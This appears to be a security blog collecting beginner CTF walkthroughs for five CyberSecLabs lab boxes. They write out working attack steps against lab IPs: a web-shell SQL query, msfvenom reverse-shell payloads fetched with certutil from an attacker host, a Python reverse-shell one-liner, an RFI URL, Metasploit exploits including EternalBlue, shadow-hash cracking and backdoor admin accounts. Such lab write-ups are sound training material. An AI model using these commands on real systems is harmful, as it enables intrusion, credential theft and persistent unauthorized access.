OutRunSec

CyberSecLabs – “Boats” Walkthrough

Boats from CyberSecLabs is a beginner Windows box hosting a web server. I’ll demonstrate two different methods of exploitation. First we exploit a insecure phpMyAdmin install, and second we take advantage of a WordPress plugin Remote File Inclusion vulnerability.

Boats IP address is 172.31.1.14.

Scanning

I start with a Nmap scan running default scripts with service enumeration enabled for all 65,535 TCP ports.

Multiple ports open. There’s a Apache web server on port 80. SMB on 445, and a few high level ports hosting HTTP services.

Enumeration

First we want to check out the web server on port 80. I see a WordPress blog apparently dedicated to the author’s love of… Boats. Cool. Not much going on here.

172.31.1.14 – A blog dedicated to Boats!

Let’s dig into this WordPress blog and see what’s hiding behind the front end web page. I run Gobuster with the big.txt wordlist to find hidden directories.

gobuster dir –wordlist /usr/share/wordlists/dirb/big.txt –url 172.31.1.14

We see several potentially interesting directories. Gobuster revealed a phpMyAdmin directory. If we browse to 172.31.1.14/phpmyadmin we find no password is required and we have full access to Phpmyadmin.

Exploitation Route #1 – phpMyAdmin

We have phpMyAdmin access but what can we do with it? If you aren’t familiar with phpMyAdmin, what is is, or how to exploit it. Start with a google search for something like phpMyAdmin reverse shell. Check out the second link from Hacking Articles.

If you scroll down into the article there’s a malicious SQL query that can be executed to create a web shell vulnerability on the web server.

The SQL query creates a file called backdoor.php which contains the php code for a standard web shell. This allows Windows commands to be executed inside the web browser and display the output on the web page.

SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

Navigate to the backdoor.php file. To interact with the php web shell add a command to the URL. If you haven’t encountered a web shell before, you can add windows commands to be executed after cmd= in the URL and the output will be displayed on the web page.

That confirms our webshell is working. We see the contents of the htdocs folder.

I do a “whoami” command and see that I already have NT Authority\System access. I could capture the flags from the browser if I wanted to.

The web shell is great for initial access and in this case you could capture the flags and be done with this box since no privilege escalation is required. However, let’s go one step further and upgrade the web shell to a meterpreter session. Upgrading your current shell to a better one is a concept that comes up often in CTFs and pentesting. You’ll want to get a good handle on this, so always practice when you can.

I create a Meterpreter reverse TCP shell payload with msfvenom with the file type of a windows executable.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.41 LPORT=1234 -f exe > shell.exe

Host the file with python http.server so we can transfer it to the target. This creates a simple web server in the directory of your choosing that hosts the files on the network so we can access them on the target.

My favorite built-in windows file transfer method is using Certutil . I execute this command in the web shell and the file is transferred to the target.

172.31.1.14/backdoor.php?cmd=certutil -urlcache -split -f http://10.10.0.41/shell.exe shell.exe

Setup a Metasploit multi handler to receive the reverse shell. Finally execute the reverse shell payload by launching the executable from the browser.

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.0.41
set LPORT 1234
run
getuid

Exploitation Route #2 – WordPress Plugin

Since that was a quick win let’s explore another attack vector present that we’ve already discovered during our enumeration phase. The WordPress blog.

I’m going to use a tool called CMSmap to enumerate the WordPress installation. Another option would be a WPScan.

I run CMSmap against the URL address which in this case is the base web directory. The -F switch enables a full scan.

CMSMap results
./cmsmap.py http://172.31.1.14 -F

In the CMSmap results I see TheCartPress plugin has a Remote File Inclusion vulnerability. Bingo. CMSmap doesn’t provide a link to the exploit, so I’ll look it up in the Exploit-Database using Searchsploit.

If you take a look at the exploit it provides a URL within the CartPress plugin directory that is vulnerable to remote file inclusion. This means we can host a file on our attack machine that will be executed on the target.

POC
http://SERVER/WP_PATH/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFIPATH

We have our Remote file inclusion vulnerability, but now what we need a file that will serve as a web shell. Search google for “remote file inclusion shell github”. The first result is an excellent php based RFI shell by Namam Sahore. This will suit our purposes perfectly.

Google Search – remote file inclusion shell github

Download or place a copy of the knock.txt file on your attack machine.

We need to host the knock.txt file so the web server can access it remotely. I’ll use the http.server python3 module.

Now in your browser add the path to the knock.txt file which includes the IP Address of your attack machine. For example the path to access knock.txt on my machine would be http://10.10.0.41/knock.txt. Hit Enter and load the web page.

You’ll see right away we have a HTTP request for the knock.txt file from the target 172.31.1.14.

Back in the browser, you’ll notice we have a basic web page with an option to issue commands and create a reverse php shell.

To use the web shell simply enter a command and hit CMD. From here we could use the same method to get a meterpreter reverse shell or we could capture the flags and be done.

http://172.31.1.14/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://10.10.0.41/knock.txt

From here you could use the same process to create a reverse shell payload and transfer it to the target. To keep things short I won’t explain the process again.

Post-Exploitation

Normally we’d capture the flags and be done but let’s go through this post-exploitation exercise. You can issue the follow commands from the web shell, however I’m working from my meterpreter prompt so I’ll spawn a shell from there.

The next two commands are simple but effective. First we create a new user for ourselves and second we add that user to the Local Administrators group.

net user outrunsec Outruns3c! /add
net localgroup administrators outrunsec /add

With the new outrunsec account created we can use Metasploit’s psexec module to get a reverse shell.

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set RHOSTS 172.31.1.14
set LHOST 10.10.0.41
set SMBUser outrunsec
set SMBPass Outruns3c!
run
getuid

Capture the Flags!

Once again I’ll drop into a command shell and capture the flags.

type “C:\Users\james\Desktop\access.txt”
type “C:\Users\Administrator\Desktop\system.txt”

There you have it two different routes for Boats from CyberSecLabs! Both exploiting different vulnerabilities to get a web shell as the NT AUTHORITY/SYSTEM user. The concepts shown here web exploitation, upgrading a shell, and creating persistence on the machine for easier repeat access are ideas that will keep coming up while pentesting.

CyberSecLabs – “Lazy” Walkthrough

Lazy from CyberSecLabs is a quick and excellent beginner box that only requires a few skills to achieve root. Basic nmap scanning, service enumeration, and exploitation through Metasploit. No privilege escalation required, and it does have a lazy feel to it.

Lazy’s IP address is 172.31.1.1

Scanning

I start with a Nmap scan running default scripts, and service enumeration against the target’s IP address.

Nmap shows SSH, HTTP, and SMB ports open. SSH isn’t a typical entry point for most beginner boxes, its mostly used after you’ve either obtained credentials, or cracked a password hash. HTTP obviously hosts a web server, in this case Nginx 1.1.19. Lastly, we have the SMB ports of 139 and 445.

Service Enumeration

I start with checking out the Nginx web server on port 80.

172.31.1.1 – Nginx web server
Nothing much here.

Not much there to be honest. We could run Nikto, and further enumerate Nginx. Which I did and didn’t find anything interesting.

That leaves us with SMB. If you look back at the original nmap scan, in the Host-script results section. There we see the Samba version is 3.6.25.

I ran a nmap script to enumerate shares against the target. Which revealed a \home\Public share that we can read/write to with anonymous access enabled.

nmap -p 445 –script=smb-enum-shares.nse 172.31.1.1

Let’s confirm our Nmap results are accurate with Smbmap.

Smbmap is making a connection with a “” or blank user and a blank password, which otherwise equals anonymous user access. In the Public folder we have Read/Write access. This confirms the Nmap script results.

Exploitation

I start by running Searchsploit for Samba 3.6.25. If you don’t get the same result, try updating the Searchsploit repository with the –update switch.

Awesome we have a Metasploit module. The ‘is_known_pipename’ exploit loads a hacked library file into a vulnerable samba server and provides a reverse shell. There are a few requirements for this module to work properly.

A writable samba share is required or valid credentials to a samba share that allows write access to the share.
Knowledge of the server side location path of the writable share.

We have a writable share, \home\Public and we know that we can access the share anonymous thus providing valid credentials. Given our Nmap, and Smbmap results we have satisfied all the requirements to run the exploit successfully.

Fire up msfconsole and search for “is_known_pipename”.

Load the is_known_pipename module. Set the module parameters, in this case all that’s needed is the RHOSTS IP address.

use exploit/linux/samba/is_known_pipename
set RHOST 172.31.1.1
run
python -c ‘import pty;pty.spawn(“/bin/bash”)’

Run the exploit. The payload is uploaded to \\172.31.1.1\Public\ and shortly after a command shell session is opened. We’ve got our reverse shell.

It’s a crappy shell, just a blank cursor, the first thing we want to do is upgrade it and spawn python bash prompt. Always keep this command handy, or better yet memorize it.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Notice now we have nice root@lazy prompt!

Capture all the flags!

cat /home/adam/access.txt
cat /root/system.txt

There you have it. Nice and easy. With only a couple of tools, and a few techniques we achieved root. Lazy and Eternal from CyberSecLabs are the boxes you should start with if you are new to pentesting or CTFs.

CyberSecLabs – “Debug” Walkthrough

Debug from CyberSecLabs is a beginner level Linux machine hosting a website. We’ll start with basic web exploitation for initial access and then learn a useful Linux privilege escalation technique.

Ping your target to verify connectivity. Debug’s IP address is 172.31.1.5.

Scanning

As always, we start with a standard Nmap scan running default scripts, service enumeration enabled, and scanning all 65,535 ports.

You can see in the output we only have two ports to work with. Port 22 hosting ssh services, and port 80 hosting a HTTP web server. This greatly reduces our initial attack surface.

If you haven’t spent a lot of time pentesting, I’ll share my experience looking for SSH exploits. Typically, I’ve found those mostly to be rabbit holes, leading nowhere. Version exploits for SSH do exist, but more often then not especially in CTFs, your probably heading in the wrong direction.

That leaves port 80, and a web server to exploit for our initial access. Browse out to the IP address of Debug, 172.31.1.5. Let’s take a look at the website.

Future Design’s website. We have a couple of pages, some filler text, not a lot there. I don’t see a login page, or anything interesting. Let’s dig a little deeper and see if there’s some hidden directories lurking behind this web server.

There’s several tools that you can use such as OWASP’s Dirbuster, Dirb, or Gobuster. Let’s use Gobuster.

gobuster dir –wordlist /usr/share/wordlists/dirb/big.txt –url 172.31.1.5

Notice the two directories we didn’t see listed on the website. One being /console and the other /server-status. When I try and navigate to /server-status I get a 404 error message, indicating I don’t have access to the webpage.

Depending on your preference, and methodology, you could have revealed this hidden /console directory using Nitko web scanner.

Initial Access

Navigate to 172.31.1.5/console.

172.31.1.5/console reveals a Interactive Console that allows python code execution

Interesting! We have a interactive console that allows us to execute python commands. I bet we can abuse this feature to get a reverse shell.

Since we know this console can execute python commands, that makes finding the right one-liner easy. If you haven’t already, bookmark this site from PenTestMonkey. It’s a great starting place for testing reverse shell one-liners.

Scroll down until you see this Python one-liner.

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“LHOST”,LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Since we are already inside a python console, remove the “python -c ‘” and the trailing comma at the end of the line. Make sure you’ve included your LHOST (local host) and a the LPORT (local port).

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.0.41”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);

To receive the python reverse shell we need a netcat listener on whichever port you specified in the one-liner. In this case, my port is 1234. With your netcat listener started, execute the python command from the console.

Sometimes the reverse shell works first try, on other occasions it takes several tries. If you don’t get a shell right away, be patient and execute the command until you do.

nc -lvnp 1234
python -c ‘import pty;pty.spawn(“/bin/bash”)’

We have a simple reverse shell running as the megan user. The first thing I want to do is spawn a TTY shell, which will give us the nice megan@debug prompt.

Privilege Escalation

What now? We need to enumerate the target system, by exploring files and services we can use or modify. This can be done manually, but there’s no reason to when automated tools and scripts will do the job for us.

I’ll be using LinPEAS as our automated privilege escalation tool. It’s part of the Privilege Escalation Awesome Scripts Suite. You can find it on Github.

Download LinPEAS.sh and fire up the Python SimpleHTTPServer on port 80 and we are ready to grab the file with wget.

I use wget to transfer the linpeas.sh file to the target and chmod to add the execute permission which we’ll need before running LinPEAS.

wget http://10.10.0.41/linpeas.sh
chmod +x linpeas.sh

Run LinPEAS.sh

LinPEAS will generate a lot of output. Under the Interesting Files section, I see a SUID binary highlighted. /usr/share/xxd has the SUID bit set, which will allow us to execute the binary with root level permissions since root is the file owner.

What is xxd? How do we use it? I’d never seen this binary before, so the first thing I did was look it up on GTFOBins. We have a SUID expoit.

XXD will allow us to read the contents of a file within the context of the root user account. What file do we already have on the system that requires root permissions to read? The /etc/shadow file if you aren’t familiar, contains all the actual password hashes for each user account on the system.

Great, we have the password hash for the root account, and our low privileged user megan. Copy the hash into a new file, I named mine “hash”. Then use John the Ripper to crack the password using the massive rockyou.txt wordlist.

*john –wordlist=/usr/share/wordlists/rockyou.txt hash*

We have the actual root password, where do we use it? You might think back to our nmap and open ports. We do have SSH open, but not all accounts have SSH access setup. We need a way to become the root account and Linux has a built-in utility to switch the current user account to the root account.

Notice after the su command and password is entered, our prompt changes context. It’s now a root@debug prompt instead of megan@debug. We’ve got root! Now we can capture all the flags.

CyberSecLabs – “Cold” Walkthrough

Cold from CyberSecLabs is a beginner level Windows box with a remote service exploit, that shows the importance of initial enumeration and directory discovery. After gaining initial access we’ll again abuse a service to elevate our privilege.

Cold’s IP address is 172.31.1.15.

Scanning and HTTP Enumeration

We start with scanning. Here I’ve used a simple nmap with the -sV switch to enable Service Enumeration. This will show us what version of a service is running if available.

Let’s review the open ports.

HTTP = 80, 443, 5500, 8500
SMB = 139, 445
MSRPC = 135, 49152-49155, 49161

So we have several ports hosting HTTP services, which is usually a juicy attack vector along with SMB, and a handful of high numbered RPC ports.

Nikto is written by Chris Sullo and David Lodge.

Now is a good time to talk about one of my favorite tools for HTTP enumeration and that is the Nikto Web Vulnerability Scanner.

Nikto is a free open source web server scanner, which scans a target website against 6000+ tests. Including scans for vulnerabilities, mis-configurations, out-dated versions, and much more. Nikto comes installed with Kali Linux, but you can installed it yourself by grabbing the latest release from Github.

Because so many different types of checks are included with Nikto, I’ve made it a practice to run Nikto on any HTTP port I encounter. In the case of Cold, we have 3 possible ports to scan with Nikto. Nothing interesting really for ports 80, or 5500, but when we run Nikto on 8500 we do find something interesting buried in the output.

Nikto has found an Administrator login page for ColdFusion!

Navigate to http://172.31.1.15:8500/CFIDE/administrator/ in your browser and we have the ColdFusion administrator login page.

Navigating to http://172.31.1.15:8500/CFIDE/administrator/ reveals a Adobe ColdFusion admin login.

What do you do when you find a administrative login page? Try to login with the most basic default passwords… such as admin/admin. Hey, what do you know…

Now we have credentials and admin access to the ColdFusion Developer console. Now what? I haven’t encountered Coldfusion before, so I don’t really know what to do with this access. Poke around and do your enumeration.

Logged into ColdFusion administration with Developer rights.

So we have ColdFusion, now we need to find an exploit.

Exploitation: Getting a reverse shell

I’ll use Searchsploit to quickly see what exploits are available for ColdFusion. You see we have several exploits for ColdFusion. Since this is a beginner box lets focus on the Metasploit modules.

Launch msfconsole and search for ColdFusion exploit modules. I see a total of 4 exploit/ modules. The exploit/ category in Metasploit is for exploits that will result in a interactive command shell.

Searching for Coldfusion modules in Metasploit.

Starting from the top, the first exploit runs on Linux. Cold is a Windows machine, so that’s out. Let’s check out the next exploit, since it will run on Windows.

The exploit will take advantage of the Ckeditor feature of ColdFusion to upload a file without authentication. So we don’t even need the credentials we discovered for ColdFusion.

Load the exploit module. Set the parameters, and then launch the exploit. It will return a simple jsp reverse shell.

Loading the exploit module. Setting the parameters. Launching the exploit.
use exploit/multi/http/coldfusion_ckeditor_file_upload
set RHOSTS 172.31.1.15
set LHOST 10.10.0.41
options
exploit

Our simple jsp reverse shell works for initial access, but let’s upgrade it to a meterpreter session so we don’t encounter problems later. That will make privilege escalation a bit easier, as right now, we are limited by our jsp shell.

I create the payload with msfvenom. You can find several cheat sheets online for payloads. This generates a meterpreter reverse shell inside a simple .exe file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.41 LPORT=1234 -f exe > shell.exe

To transfer files on windows my favorite tool is certutil. So that’s what I’ll use to get shell.exe. You’ll also need to host the file, so we can access it on the network. Python SimpleHTTPServer will do will do that for us.

certutil.exe -urlcache -f http://10.10.0.41/shell.exe shell.exe

You’ll see the HTTP request after you run the certutil.exe command.

Here you see the HTTP Request for the file.
python -m SimpleHTTPServer 80

Start a new Metasploit session and fire up the exploit/multi/handler to receive the meterpreter shell.

After you’ve started the exploit/multi/handler go back to your original meterpreter shell and launch the shell.exe file.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.0.41
set LPORT 1234
run

Privilege Escalation

We have our low privilege shell but now we need to scan the target to find our escalation path to system. One of best and most popular tools for doing this is the PEASS – Privilege Escalation Awesome Scripts SUITE. You can get it here.

Since certutil.exe worked to transfer the first meterpreter shell, we’ll use it again. Make sure you still have your python http server running to host the file.

*certutil.exe -urlcache -f http://10.10.0.41/winPEAS.exe winPEAS.exe*

Now I can run winPEAS.exe like any executable. It has a lot of output. I scrolled down until I found the Services Information.

At the bottom, we can modify the “cold” service. Not only does it contain an unquoted service path we can WriteData/CreateFiles. So we can change the configuration of the service to run an executable of our choosing. Since we already have our meterpreter shell on the target, lets reuse that.

Our shell is located in C:\ColdFusion2018\cfusion\bin\. We need to change the service’s configuration binpath to the shell.exe path. We’ll do that using “sc” a built-in windows command line utility for managing services.

sc config cold binpath=”C:\ColdFusion2018\cfusion\bin\shell.exe”
sc start cold

Receiving the reverse shell as NT Authority and watching it die after about 30 seconds.

Notice our meterpreter session died, approximately 30 seconds after starting. We have a error message indicating a problem starting the service, and mostly likely a timeout was reached so it killed the process. If you are really fast, you could type out the access.txt and system.txt files since you have the shell for a brief period of time.

Maintaining Access

Instead of racing to beat the 30 second timeout on the reverse shell, let’s create a persistent session. First we create a new user, and then we add that user to the local admin group.

net user outrunsec Outruns3c! /add

net localgroup administrators outrunsec /add

To utilize the new outrunsec account, we will connect to it using a great penetration testing framework. Evil-WinRM.

Evil-WinRM takes advantage of the Windows Remote Management feature included on servers. It has a lot of features, primarily for post-exploitation. We will only be using it to create a session and get a command prompt. You can get and learn more about Evil-WinRM here.

evil-winrm -i 172.31.1.15 -u outrunsec -p ‘Outruns3c!’
whoami
type C:\Users\Administrator\Desktop\system.txt
type C:\Users\jade\Desktop\access.txt

There you have it. Cold from CyberSecLabs.

This was my first time encountering Adobe ColdFusion, which I learned to pay attention to all HTTP ports and enumerate them with Nikto. Privilege escalation was good practice at service exploitation, along with how to deal with a unstable root shell.

CyberSecLabs – “Eternal” Walkthrough

Eternal from CyberSecLabs is a Window box with a well known SMB remote code execution exploit. I’ll show you how to exploit it with Metasploit, and using a OSCP approved manual tool.

My first Capture the Flag Write-up!

Let’s get started. We are working on Eternal from CyberSecLabs which is a Windows box that lives at 172.31.1.10.

Scanning

I start with the following Nmap scan. This is my favorite scan to start with. It does not work in all scenarios against all targets, but it usually provides enough information to get you started.

nmap -sC -sV -oN nmap 172.31.1.10

-sC = Runs default scripts
-sV = Enables Service Version Scanning
-oN = Outputs scan results into a file named “nmap” using the nmap format

Interestingly we don’t have typical services running like SSH, and FTP. Also no web server being hosted, on port 80. This is important because it tells us something about our initial attack vector. We don’t have FTP, or a Web server to exploit for our initial access. So we will focus on the SMB range of ports which are 135, 139, and specifically 445.

Now I will continue use nmap to gather more information about our target. To see what Nmap scripts we have available we can do the following ls command. We’ll use smb-vuln* to show all scripts related to SMB vulnerabilities.

ls -ls /usr/share/nmap/scripts/smb-vuln*

I could run a scan that checked for all the smb vulnerabilities in nmap.

nmap –script=smb-vuln* 172.31.1.10

However that takes awhile, and either way you’ll reveal the same information. Let’s run the following nmap script scan to check if the target is vulnerable to MS17-010.

nmap -p 445 172.31.1.10 –script=smb-vuln-ms17-010

In the Host script results section we see the target is vulnerable to MS17-010. Otherwise known as Eternal Blue! The name of the box is a dead giveaway.

Searching for MS17-010 Exploits

An excellent tool we can use to find exploits quickly, is the Searchsploit command. Which searches the local Exploit-DB repository on Kali Linux.

There’s multiple exploits available, including a couple Metasploit modules.

Exploiting Eternal Blue – Metasploit Route

I’ll explain a bit about Metasploit since this box is aimed at beginner’s.

The Metasploit Framework is a suite of tools that allows you to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. It’s truly the Pentesters best friend, especially when you are starting out.

msfconsole

This will launch the Metasploit framework console.

At the msf5 prompt. Search for MS17-010 modules. We want to use exploit/windows/smb/ms17_010_etnernalblue. Show the options, and as usual we need to set the remote hosts IP address, the RHOSTS parameter. Set RHOSTS to 172.31.1.10.

*Search MS17-010*
*Use exploit/windows/smb/ms17_010_eternalblue*
*Options*
*set RHOSTS 172.31.1.10*

Always a good idea to confirm the module parameters are correct before launching your exploit. Type “options” to show the module options.

*Confirm exploit parameters. Verify RHOSTS address is 172.31.1.10*

The exploit is ready to go. Type “run” or if you want to feel more like a hacker you can use “exploit” as well to launch the exploit.

I’ve seen this exploit fail a few times, before it eventually succeeds, if your exploit doesn’t work the first try, be patient. The exploit results in a simple CMD shell, so you don’t have a Meterpreter prompt to interact with. I simply started typing something like the “whoami” command. This confirms we have a NT Authority SYSTEM shell. From this shell, we could capture both the user flag, and the root flag. Boom. Done.

Exploitation with AutoBlue

So you’ve seen how easy Eternal Blue is to exploit with Metasploit. Now we will use a more manual way of exploiting Eternal Blue which can be located here.

To get started, git clone the repository to your local machine or download the files from Github. CD into the AutoBlue directory, and you’ll several exploit files and and shellcode folder. Before we go any further lets confirm this exploit will work on our target. To do this I run the Eternal_Checker.py script. It tells us that the target is not patched, indicating the presence of the vulnerability.

AutoBlue also includes a exploit that relies on a named piped. To test this we can attempt to run the zzz_exploit.py script. This will fail, and you’ll note in the status it tells us that it could not find an accessible named pipe.

*git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git*
*cd AutoBlue-MS17-010*
ls
*python eternal_checker.py 172.31.1.10*
*python zzz_exploit.py 172.31.1.10*

If we navigate into the shellcode directory, we find a helpful script named shell_prep.sh. This is not necessary as all this script does is generate a payload using msfvenom. You can easily do this yourself, but since this is included I wanted to demonstrate how it works. It’s also helpful, in that it generates the payload, and displays the msfvenom syntax its using to build the payload. Just copy that line and run it to generate the same payload.

I set my LHOST, and the ports for both x86, and x64 listeners. This is important, if you aren’t sure if the target is 64-bit or 32-bit architecture. I’m opting to build a regular ole CMD shell instead of a Meterpreter shell. I’m also selecting to make this payload a “stageless” payload. This means the entire payload will be sent at once, instead of in “stages”. Each payload is generated with msfvenom, 64 bit and 32 bit and stored in the shellcode directory.

With our payloads generated, we need to setup our listeners on the ports we specified in our shell_prep. Those are 4444 and 4446. Now, AutoBlue also includes a listener_prep.sh script. However, I won’t be using this since all we need here is a simple netcat listener setup for each port. Go ahead and start a netcat listener in a new terminal window.

nc -lvnp 4444
nc -lvnp 4446

-l = listener mode
-v = verbose output
-n = no name resolution. Doesn’t perform DNS lookups
-p = local port

With your netcat listener running, its time to launch the exploit. AutoBlue includes exploits for multiple Windows operating systems, and for this target we will use the eternablue_exploit7.py script. You’ll need to specify the target IP address, and the path to the sc_all.bin file. This is located inside the shellcode directory. Now, run the exploit.

*Launching the exploit.*
*python eternalblue_exploit7.py 172.31.1.10 /root/CSL/Eternal/AutoBlue-MS17-010/shellcode/sc_all.bin*

You should almost instantly receive a reverse shell connection to your netcat listener. If you don’t get a reverse shell within a few seconds, double check you have everything set correctly. I received this on port 4444 which indicates the target is 64-bit architecture. I type in the “whoami” command to confirm that our shell is indeed running as NT Authority SYSTEM.

*Receiving the NT Authority reverse shell on port 4444 using a Netcat listener.*
*nc -lvnp 4444*
*whoami*
*hostname*

Thanks for reading, I hope you found this helpful.

Stay tuned for more write-ups, walk-through’s and more.

Welcome to OutRunSec

I had a unique idea. Bring together two of my passions. Cyber Security and Outrun /Synth-wave/Retro-wave music and aesthetic to create a…. wait for it….a Cyber security blog with a Outrun theme!

Fast forward a couple certifications and months spent hacking the box and capturing flags, I’m ready to take the next step and actually create the blog.

Create a cyber security / ethical hacking blog might not be a unique idea, but it did sound rewarding and like a good chance to share while I continue my career development and interest in Cyber. I’ll have a place to share my experiences and do those awesome Write-ups for all the CTFs. Maybe someone will find this useful like I did, when I was working on many, many boxes out there.

That’s what you’ll get here. Cyber Security, CTF write-ups, tool cheat sheets and tips, and general Cyber Security info. Plus I’ll have some links and recommendations for OutRun movies and music.